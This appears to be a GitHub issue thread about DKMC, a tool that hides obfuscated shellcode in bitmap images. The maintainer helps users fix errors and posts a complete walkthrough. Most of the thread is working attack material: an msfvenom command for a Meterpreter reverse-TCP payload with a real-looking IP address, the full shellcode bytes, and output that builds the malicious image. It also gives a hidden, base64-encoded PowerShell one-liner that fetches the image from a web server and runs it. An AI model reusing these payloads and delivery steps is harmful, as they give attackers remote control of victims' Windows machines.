shows error
amainyebriggs opened this issue · comments
shellcode format should be \x00\x00\x00 you are probably not using the right format.
How do I do thata
I used the SC it's still the same error
Hey man. Great work with this tool. However, I'm also getting the error message after using sc command.
Before launching the tool make sure to create the output folder
$ git clone https://github.com/Mr-Un1k0d3r/DKMC
$ cd DKMC
$ mkdir output
msfvenom -a x86 -p windows/meterpreter/reverse_tcp -e generic/none -f raw LPORT=8080 LHOST=24.37.41.158 > payload
(shellcode)>>> set source /root/payload
[+] source value is set.
(shellcode)>>> run
[+] Shellcode:
\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5
(shellcode)>>> exit
(generate)>>> set shellcode \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5
[+] shellcode value is set.
(generate)>>> run
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x35af22c7
[+] Shellcode size 0x12b (299) bytes
[+] Adding 1 bytes of padding
[+] Generating magic bytes 0xa1957f94
[+] Final shellcode length is 0x17b (379) bytes
[+] New BMP header set to 0x424de980c50300
[+] New height is 0x0e010000 (270)
[+] Successfully save the image. (/root/DKMC/output/output-1505309035.bmp)
If you are following this path it should work as expected.
i have followed the steps still outputs the same error am using kali linux i386
Yeah still having issues. Testing on Windows 10 Python 2.7
(generate)>>> set shellcode \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5
�[32m[+] shellcode value is set.�[00m
(generate)>>> run
�[32m[+] Image size is 300 x 275�[00m
�[32m[+] Generating obfuscation key 0x11943dc6�[00m
�[32m[+] Shellcode size 0x12b (299) bytes�[00m
�[32m[+] Adding 1 bytes of padding�[00m
�[32m[+] Generating magic bytes 0x37621f45�[00m
�[91m[-] >>> Something when wrong during the obfuscation. Wrong shellcode format?�[00m
can you try to update the gen.py with the one I attached and show me the error stack trace.
the gen.py is located in module/ folder
Possible missing import?
(generate)>>> run
�[32m[+] Image size is 300 x 275�[00m
�[32m[+] Generating obfuscation key 0x5242695b�[00m
�[32m[+] Shellcode size 0xc7 (199) bytes�[00m
�[32m[+] Adding 1 bytes of padding�[00m
�[32m[+] Generating magic bytes 0xf2e29eaaL�[00m
Traceback (most recent call last):
File "dkmc.py", line 39, in
mod.show_menu()
File "C:\DKMC-master\module\module.py", line 21, in show_menu
self.do_action()
File "C:\DKMC-master\module\module.py", line 42, in do_action
self.exec_action(data)
File "C:\DKMC-master\module\module.py", line 57, in exec_action
self.run_action()
File "C:\DKMC-master\module\gen.py", line 44, in run_action
shellcode = self.gen_shellcode(self.vars["shellcode"][0])
File "C:\DKMC-master\module\gen.py", line 76, in gen_shellcode
shellcode = hex(magic)[2:].decode("hex") + shellcode
File "C:\Python27\lib\encodings\hex_codec.py", line 42, in hex_decode
output = binascii.a2b_hex(input)
TypeError: Odd-length string
Okay this is caused by your copy paste it probably add some \r\n at the end when you copy it. To avoid that I'll strip the input before processing.
pushed the patch to remove \r & \n
git pull and you should be good
Still no luck with your code unfortunately.
I have been playing around with gen.py specifically the gen_shellcode function. It seems the shell code length gets messed when adding other bytes.
(generate)>>> run
�[32m[+] Image size is 300 x 275�[00m
�[32m[+] Generating obfuscation key 0x128b4be7�[00m
�[32m[+] Shellcode size 0x31c (796) bytes�[00m
�[32m[+] Generating magic bytes 0x4349e106�[00m
�[32m[+] Shellcode size 0x324 (804) bytes�[00m
�[32m[+] Shellcode size 0x324 (804) bytes�[00m
�[32m[+] Shellcode size 0x377 (887) bytes�[00m
�[32m[+] Shellcode size 0x377 (887) bytes�[00m
�[32m[+] Adding 1 bytes of padding�[00m
�[32m[+] Shellcode size 0x378 (888) bytes�[00m
�[32m[+] Final shellcode length is 0x370 (880) bytes�[00m
�[32m[+] New BMP header set to 0x424de98bc30300�[00m
�[32m[+] New height is 0x0e010000 (270)�[00m
�[32m[+] Successfully save the image. (C:\DKMC-master/output/output-1505416245.bmp)�[00m
This doesn't let me execute the shell code but it's progress
This is the expected behavior. This module only generate the final payload. You can now use the image C:\DKMC-master/output/output-1505416245.bmp to deliver your payload
The ps and web module allow you to generate the powershell one liner pretty easily.
Powershell and web server work perfectly. But I'm still not getting code execution. I had to remove in the pad_shellcode shellcode.replace("\x","").decode. I doubt that the format is correct to execute. I've no idea what to do.
Here is the complete WalkThrough of how to get a shell it work #1 on my side.
Tool output:
=====================================================================
| |
| Module to generate shellcode out of raw metasploit shellcode file |
| |
=====================================================================
Allowed options:
[*] (show) Show module variables
[*] (set) Set value (set key value)
[*] (run) Run the module
[*] (exit) Go back to the main menu
Module Variables description:
source Path to the raw shellcode file
Current variable value:
source =
(shellcode)>>> set source SHELLCODE
[+] source value is set.
(shellcode)>>> run
[+] Shellcode:
\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5
(shellcode)>>> exit
=================================================================================
| |
| Module to generate malicious Bitmap image with embedded obfuscation shellcode |
| |
=================================================================================
Allowed options:
[*] (show) Show module variables
[*] (set) Set value (set key value)
[*] (run) Run the module
[*] (exit) Go back to the main menu
Module Variables description:
debug Show debug output. More verbose
source Image source file path
shellcode Shellcode payload using \x41\x41 format
output Output file path
Current variable value:
debug = false
source = sample/default.bmp
shellcode =
output = output/output.bmp
(generate)>>> set shellcode \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5
[+] shellcode value is set.
(generate)>>> run
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x3b1bf4e3
[+] Shellcode size 0x12b (299) bytes
[+] Adding 1 bytes of padding
[+] Generating magic bytes 0xdfe6936e
[+] Final shellcode length is 0x17b (379) bytes
[+] New BMP header set to 0x424de980c50300
[+] New height is 0x0e010000 (270)
[+] Successfully save the image. (/home/me/DKMC/output/output.bmp)
(generate)>>> exit
=========================================
| |
| Module to generate Powershell payload |
| |
=========================================
Allowed options:
[*] (show) Show module variables
[*] (set) Set value (set key value)
[*] (run) Run the module
[*] (exit) Go back to the main menu
Module Variables description:
url Url that point to the malicious image
rand Use random variables name
Current variable value:
url =
rand = true
(powershell)>>> set url http://10.0.0.153:8080/output.bmp
[+] url value is set.
(powershell)>>> run
[+] Powershell script:
powershell.exe -nop -w hidden -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBDAEcAbgBwAHUAbABrAEMALwB6AEUAMQBNAEQAVQAwAE0AagBFADIATgB6AE0AdQBNAGoAWQAhAHYAVgBaAHQAVAA5AHMANgBGAFAANgBPAHgASAArAHcAcABrAHAASgBwAEQAUQBVADIASgBVAG0AcABFAGsAcgBiAFkARQBPAFcAbgBvAEoARgBMAHEAdQBtAHQAegBrAHAARABFADQAYwBiACEAZABvAEkAegA5ADkAMwB1AGMASgBxAE8AcwA1AFYANgBtAFMAVABmADkAVQBMACsAYwBZAHgAOAAvAHoAegBtAFAANwBZAE8AdQArADEAcQB5AFEAUABkAEUAQwBLAFEAKwBCAEsAbQBZAFMATQBuAE8ANQBzAGIAbQBSAHUAMwBvADYAUABNACEAKwB1ADMAVwA0AGUAMQBJAFAAKwA0AC8AMwBwAHkAcgBlAC8ASwBSAGYATABJADIATgA2AEkAOABEAGIAUQB4ADcASQA3AE8AcgB0AHYAZABiAFAAYgA1ADcASwB5AG4AagA1AE8ARABxADYAUABoAE0AZgBtACsAdQBVAEgASwBiADAAIQBsAFQAWQBoAGQAdQA2AFAAeQBXAHkATABDAG4ASQBOAEwAaQBrADQAbQBSAFEAQgBoAEwAcwBGADUATgBxADcAUgA3AFAAeAB4AEgAbwB0AHoAeABuACEAZgBlADkAegBNAHMAcgBaAEkASwBFAHMAbgBlADMAdQB0AFgARQBwAEkAOQBhAEwAdgBIAFkASgB1AEsAZwBYAEoAbABEAE4AUQB0AGsATwBlAHkARwBVAE0ARQB1AHEAbgAwADIAcwBJAE4AUABsAE8AYQB0ACsAOABRAHkANgBtAGwASgBkAG0AOAB4AFkATgBZAGoAeABnAE0AdwAzAE4AMwBJAGsASQBxAEkAbgBmADgAegBQAE8AdABHADEAOQAvAFcAbwA1ADQALwByADIAeABPAHYAYwA1AHAAUQByADIALwBMAG4AUwBrAFAAaQBoAFoAeABiAEQAdgBuAGgAbQAhADMAUAA1AHgAbgBZAFYAbwA4AEYAVQBpAGcAUgBhAGUAKwBTAHAAYgBzADcAMwBrAFcAcQBhACEAUgA5AFgATwAwAE8AZQBxAEIAagBFAFMAcgBMAE0AZQBoAFYAaAA1AEsAZwBjADUAawB1AG4AOAAwAHMAdABqAEMAMQBMAFcAdwBPAEUASQBsAG0ARwBFAHAAUQA2AE8AbAAxADAAegB0AHgAIQAzAFkAdAB6AFQAbAAzAHkAUwBkADcAWABFAFoAeQBsAHEAZQBhAEoAWQBEAHoARwBxAFQASQBmAEoAQgAzAEwAIQBEAGwASABkAEUAMAA1AEgAIQBHADAAYwBUAHUAdwAzADAARgB3AEYAdQBkADcARwBVAG4AdABCAHAAbwA2AGIAaABJADEANgB2AEIAOQBnAG8ATwBGAC8ANgBXAHMAeAByAHUARQB0AEUATwBmAGkAdABrAEkAegBRAC8ARABEAG8ALwBFADQAagBQAFIAZABTAE0AZwArAHYAcAA5AFEATgBsAFIANABPAEQANAA2AHQAcwBUAGYANAA4AEQAMQBUAGYAdQBKAGcAQgBQAEoAYwA5AEUASQBvAFYAYQAzADAAawBEAFoAZgAwAE0ARABhAHEAaABaAHgAagB0ADMAWQB1AGMAMwAhAG0AWgBHAHkANABHADAAOABtAHAARABiADEAYgAwACsASABEACsANQBiADEAOQB1AHUAbgBOAEYAMQBsAHAAegA2AC8AbQBVAHYAagB2ADQAZQBaAGYATABLADUAKwBGAEkAMABaAHQAawBpAGwAYgBqAG8AVwBEAGgANQBIAG4ATgBGAC8AegBYAFIAcQB4AHoARgBZACsATQAyAGUAdgA1ADMASQBhAEkAcABkAEMAZQBwAHoAUgBoAFEAWgBXAHkAOQBqAHAARwBJAGUASgBRAEkATwBkAFYAWgBuADAATQAyADcAYgBLAEMAUQBqAGIAdwBHAEYARwB0AFcASABIAEoAZQBOAFYAdAAwADcAQwA5AEUALwBmAC8AWgB6AHgARQBHAFEAegB3AEsAeABRAEcAQgBVAG0AagBQAE0AeQBtACEAWABoAHQAdABWAE4AZQA1ACEAZwBxAG8AdQArAGgAYwBSAEcAVwBDAGgAUQBXAFoAZgBGAE0AYQA5ADIATgAzADAAMABzAGwAcQBjAEsAdQBXAFMAUQBZADYAVgBHAHIAagBFAEIAOABvAGgAZABFAGsAegBWAGEAeQBjAGEAdQBaAGEARgBFADMAcgBPAGQAeABlAHoAagBVAEwAcQBOAEwAVgBjAGgATgBuAEIAZABCAHkANAA1AFoASQBsAFoAWgA1AGcASQB3AGoAQwBPAGQAKwBCAGcARwBqADMARwBEAGkAawBpAE0AVwB3AHYANwBjAFoANwBNAHEAIQBHAHMAdABJAGkAMwBLAE8AVQB0AG4AdQBOAEkAZABNAG8ASQBqAEIAZwBsAGYAbQB6AHkAUwBHAEcAdQBaAE0ANAA3AG4AZwArADQAbQBHAFkAYwBFAHIAUQByADEATwBPAEIAMABoAGwAcABSAFYAbABtAFIAZQBuAFEARwBvAGYAVgBxAHMARgBVAGgATABhAHIARwA0AEYATQBCAHMAeABRAHEAawB1ADUAegBvAFYAMAB5AFoARgBLAGoARwBoAG0AcwBYADgAbQA5AFAAdwB5AHUAawBxAFkAeQB4AHAAYQBFAGsAagBtADcASwB0AFAAeAAvAGwAeQBiAHcAcQBsAEYARwBnAFAAMgA3ADIALwBaADQATwBRAHcAUABvAHcAZgBmAFMAUABRAHEAKwBuAFoAQgA5AFIARgBtAEwAWgBRAGwAbABPAE4AdQBTAEgAdQBVAHkANQBvADIASwBhAGEAMgB1ADkAaQByAGIATwA5AHIAYQAzAHQAaABtAGQAKwAyADMALwB0ADcAbgAxAG8AZgBHAGgAcwBpAFYAeABuAHUAZgBhAG0AUwBmAGEAdQBLAEoAegBhAEwARgBQAHQAMwByAFcATQB1ADQAUABUAC8AdQBuAGgAaABhAG0AYwAvADkAQwB6AEgAcABVAHEAcABoAHgAcABRADQAbQBxAGMAdQBaACEAeQBJAE4AUwBaAFEAYQBDAEcAUQAvAGIAWABuAHQAZAAzAFkAQgBNAGcAYQBPAFcAbwA5AHAAWABvAEQAYwA1AEYANABHAFIAdwBuAFgANgBoAEsAcQA4ADAATQBvAEoANQB0AE0ARgBOAG4AZAAzADEAcgBZAGMAOAB0AFAAUQBlAGQAYgBLAGEAbQBoAHYANwB3AHMAZQB3AGgAVABTAHIAOQBoADYASgA1AEQATwBkAE8AdwAyAEgAbgBZAGIARABaAFMAMAB4AHMAUAA3AEIAawBMAHoAZABoAFIAYQBJAHAAdgBiAHEAKwB1ADYAUgBoADkALwBoAFgAZAB0ACEATAB3AEkAWQBFAEYASABlAHoAUwBNAGcAcwA2AGQAZgA4AGwAUAB0AEsARAAvAEwAeAB0AGwAUwBzAGIANABGAC8ANABtAEcAOAA5AGoALwB6AEwANwBKAG8AWQBhADcAZwBwAG0ASwB4AFkAdgBCADMANgBMAHIARAA4AEcANgBaAEkAeQBqAFoANAArAGEAaABpAEgAUgBUADIAKwBDAGEAcwB5AFMAWgBkAHUAOABaAGQAVQBZAC8ANQBGADUAVwBkAGUAVwBLAGUANQByAHYAZgB4AG0AdAAvAGMAcwBEADYAWgB4AE8AaABHAFoAIQBrAHAAeABSADcAeABlAFEAVwAzADUASQBPAHoAZgBIADgAcgBUAGEAVwB1AFgANABzAHAAdgBzAGsAeQBjADgAUABhAHQAYQBUAGYAagB0AGgARABKAHoAbABvAHQAVABzAFgAdwB5ADgAbgArAGYARwA5AG0AagA5AHcAaAAzAFEANwBWACsAUwAxAFcAZgBLAEQAMQBCAEgASwBwAHQAcgBkAHcAVQBlAGMAbgBPAFYARwA1ADgAagBhAEYAKwBvAFQAdQBVAGQAIQBpAGoAMgBmAHkAQgBrAEUAZwBDACsAegArAG0AYwB4AEwAUwBRAE4AOABNADUAYQBqAHEALwBZAGMAOAAwAHEAYQBQAHcAUAAzAGEAaQBJADkAUgB3AEwAIQAhACEAPQAiAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIAAiAEEAIgApACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==
(powershell)>>> exit
=================================
| |
| Module to launch a web server |
| |
=================================
Allowed options:
[*] (show) Show module variables
[*] (set) Set value (set key value)
[*] (run) Run the module
[*] (exit) Go back to the main menu
Module Variables description:
folder Base folder used to deliver files
certificate Certificate path
port Port used to bind the web server
https Use HTTPS
Current variable value:
folder = /home/charles.hamilton/DKMC/output/
certificate = core/util/cert/default.pem
port = 80
https = false
(web)>>> run
[+] Starting web server on port 80
[+] Stopping web server
(web)>>> set port 8080
[+] port value is set.
(web)>>> run
[+] Starting web server on port 8080
On the PowerShell console I ran the PowerShell one liner:
powershell.exe -nop -w hidden -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBDAEcAbgBwAHUAbABrAEMALwB6AEUAMQBNAEQAVQAwAE0AagBFADIATgB6AE0AdQBNAGoAWQAhAHYAVgBaAHQAVAA5AHMANgBGAFAANgBPAHgASAArAHcAcABrAHAASgBwAEQAUQBVADIASgBVAG0AcABFAGsAcgBiAFkARQBPAFcAbgBvAEoARgBMAHEAdQBtAHQAegBrAHAARABFADQAYwBiACEAZABvAEkAegA5ADkAMwB1AGMASgBxAE8AcwA1AFYANgBtAFMAVABmADkAVQBMACsAYwBZAHgAOAAvAHoAegBtAFAANwBZAE8AdQArADEAcQB5AFEAUABkAEUAQwBLAFEAKwBCAEsAbQBZAFMATQBuAE8ANQBzAGIAbQBSAHUAMwBvADYAUABNACEAKwB1ADMAVwA0AGUAMQBJAFAAKwA0AC8AMwBwAHkAcgBlAC8ASwBSAGYATABJADIATgA2AEkAOABEAGIAUQB4ADcASQA3AE8AcgB0AHYAZABiAFAAYgA1ADcASwB5AG4AagA1AE8ARABxADYAUABoAE0AZgBtACsAdQBVAEgASwBiADAAIQBsAFQAWQBoAGQAdQA2AFAAeQBXAHkATABDAG4ASQBOAEwAaQBrADQAbQBSAFEAQgBoAEwAcwBGADUATgBxADcAUgA3AFAAeAB4AEgAbwB0AHoAeABuACEAZgBlADkAegBNAHMAcgBaAEkASwBFAHMAbgBlADMAdQB0AFgARQBwAEkAOQBhAEwAdgBIAFkASgB1AEsAZwBYAEoAbABEAE4AUQB0AGsATwBlAHkARwBVAE0ARQB1AHEAbgAwADIAcwBJAE4AUABsAE8AYQB0ACsAOABRAHkANgBtAGwASgBkAG0AOAB4AFkATgBZAGoAeABnAE0AdwAzAE4AMwBJAGsASQBxAEkAbgBmADgAegBQAE8AdABHADEAOQAvAFcAbwA1ADQALwByADIAeABPAHYAYwA1AHAAUQByADIALwBMAG4AUwBrAFAAaQBoAFoAeABiAEQAdgBuAGgAbQAhADMAUAA1AHgAbgBZAFYAbwA4AEYAVQBpAGcAUgBhAGUAKwBTAHAAYgBzADcAMwBrAFcAcQBhACEAUgA5AFgATwAwAE8AZQBxAEIAagBFAFMAcgBMAE0AZQBoAFYAaAA1AEsAZwBjADUAawB1AG4AOAAwAHMAdABqAEMAMQBMAFcAdwBPAEUASQBsAG0ARwBFAHAAUQA2AE8AbAAxADAAegB0AHgAIQAzAFkAdAB6AFQAbAAzAHkAUwBkADcAWABFAFoAeQBsAHEAZQBhAEoAWQBEAHoARwBxAFQASQBmAEoAQgAzAEwAIQBEAGwASABkAEUAMAA1AEgAIQBHADAAYwBUAHUAdwAzADAARgB3AEYAdQBkADcARwBVAG4AdABCAHAAbwA2AGIAaABJADEANgB2AEIAOQBnAG8ATwBGAC8ANgBXAHMAeAByAHUARQB0AEUATwBmAGkAdABrAEkAegBRAC8ARABEAG8ALwBFADQAagBQAFIAZABTAE0AZwArAHYAcAA5AFEATgBsAFIANABPAEQANAA2AHQAcwBUAGYANAA4AEQAMQBUAGYAdQBKAGcAQgBQAEoAYwA5AEUASQBvAFYAYQAzADAAawBEAFoAZgAwAE0ARABhAHEAaABaAHgAagB0ADMAWQB1AGMAMwAhAG0AWgBHAHkANABHADAAOABtAHAARABiADEAYgAwACsASABEACsANQBiADEAOQB1AHUAbgBOAEYAMQBsAHAAegA2AC8AbQBVAHYAagB2ADQAZQBaAGYATABLADUAKwBGAEkAMABaAHQAawBpAGwAYgBqAG8AVwBEAGgANQBIAG4ATgBGAC8AegBYAFIAcQB4AHoARgBZACsATQAyAGUAdgA1ADMASQBhAEkAcABkAEMAZQBwAHoAUgBoAFEAWgBXAHkAOQBqAHAARwBJAGUASgBRAEkATwBkAFYAWgBuADAATQAyADcAYgBLAEMAUQBqAGIAdwBHAEYARwB0AFcASABIAEoAZQBOAFYAdAAwADcAQwA5AEUALwBmAC8AWgB6AHgARQBHAFEAegB3AEsAeABRAEcAQgBVAG0AagBQAE0AeQBtACEAWABoAHQAdABWAE4AZQA1ACEAZwBxAG8AdQArAGgAYwBSAEcAVwBDAGgAUQBXAFoAZgBGAE0AYQA5ADIATgAzA